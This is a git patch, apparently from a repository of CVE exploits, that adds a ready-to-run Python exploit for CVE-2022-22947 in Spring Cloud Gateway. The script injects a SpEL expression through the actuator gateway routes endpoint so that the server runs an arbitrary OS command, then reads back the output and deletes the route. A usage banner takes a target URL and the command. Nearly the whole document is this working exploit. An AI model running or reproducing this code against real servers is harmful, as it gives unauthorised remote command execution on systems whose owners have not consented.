From 001c32242e87157d5e3a7c39a03b2b388cdc38a7 Mon Sep 17 00:00:00 2001 From: helloexp <21156949+helloexp@users.noreply.github.com> Date: Fri, 4 Mar 2022 11:06:16 +0800 Subject: [PATCH] =?UTF-8?q?CVE-2022-22947=20=E6=96=B0=E5=A2=9E=E4=B8=80?= =?UTF-8?q?=E4=B8=AAexp?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- .../{spring_cloud_RCE.py => exp/exp01.py} | 0 00-CVE_EXP/CVE-2022-22947/exp/exp02.py | 71 +++++++++++++++++++ .../CVE-2022-22947/exp/requirements.txt | 5 ++ 3 files changed, 76 insertions(+) rename 00-CVE_EXP/CVE-2022-22947/{spring_cloud_RCE.py => exp/exp01.py} (100%) create mode 100644 00-CVE_EXP/CVE-2022-22947/exp/exp02.py create mode 100644 00-CVE_EXP/CVE-2022-22947/exp/requirements.txt diff --git a/00-CVE_EXP/CVE-2022-22947/spring_cloud_RCE.py b/00-CVE_EXP/CVE-2022-22947/exp/exp01.py similarity index 100% rename from 00-CVE_EXP/CVE-2022-22947/spring_cloud_RCE.py rename to 00-CVE_EXP/CVE-2022-22947/exp/exp01.py diff --git a/00-CVE_EXP/CVE-2022-22947/exp/exp02.py b/00-CVE_EXP/CVE-2022-22947/exp/exp02.py new file mode 100644 index 0000000..c00aad9 --- /dev/null +++ b/00-CVE_EXP/CVE-2022-22947/exp/exp02.py @@ -0,0 +1,71 @@ +import random +import string +import requests +import json +import sys +import urllib.parse +import base64 + +headers = { "Content-Type": "application/json" , 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36','Accept' : '*/*'} + +id = ''.join(random.choice(string.ascii_lowercase) for i in range(8)) + +def exploit(url, command): + + payload = { "id": id, "filters": [{ "name": "AddResponseHeader", "args": { "name": "Result", "value": "#{new String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(\u0022"+command+"\u0022).getInputStream()))}"}}],"uri": "http://example.com"} + + rbase = requests.post(url + '/actuator/gateway/routes/'+id, headers=headers, data=json.dumps(payload), verify=False) + if(rbase.status_code == 201): + print("[+] Stage deployed to /actuator/gateway/routes/"+id) + print("[+] Executing command...") + r = requests.post(url + '/actuator/gateway/refresh', headers=headers, verify=False) + if(r.status_code == 200): + print("[+] getting result...") + r = requests.get(url + '/actuator/gateway/routes/' + id, headers=headers, verify=False) + if(r.status_code == 200): + get_response = r.json() + clean(url, id) + return get_response['filters'][0].split("'")[1] + else: + print("[-] Error: Invalid response") + clean(url, id) + exit(1) + else: + clean(url, id) + print("[-] Error executing command") + + +def clean(url, id): + remove = requests.delete(url + '/actuator/gateway/routes/' + id, headers=headers, verify=False) + if(remove.status_code == 200): + print("[+] Stage removed!") + else: + print("[-] Error: Fail to remove stage") + +def banner(): + print(""" + ################################################### + # # + # Exploit for CVE-2022-22947 # + # # + # Usage: # + # python3 exploit.py # + # # + # Example: # + # python3 exploit.py http://localhost:8080 'id' # + # # + ################################################### + """) + +def main(): + banner() + if len(sys.argv) != 3: + print("[-] Error: Invalid arguments") + print("[-] Usage: python3 exploit.py ") + exit(1) + else: + url = sys.argv[1] + command = sys.argv[2] + print(exploit(url, command)) +if __name__ == '__main__': + main() \ No newline at end of file diff --git a/00-CVE_EXP/CVE-2022-22947/exp/requirements.txt b/00-CVE_EXP/CVE-2022-22947/exp/requirements.txt new file mode 100644 index 0000000..e4f9df0 --- /dev/null +++ b/00-CVE_EXP/CVE-2022-22947/exp/requirements.txt @@ -0,0 +1,5 @@ +certifi==2021.10.8 +charset-normalizer==2.0.12 +idna==3.3 +requests==2.27.1 +urllib3==1.26.8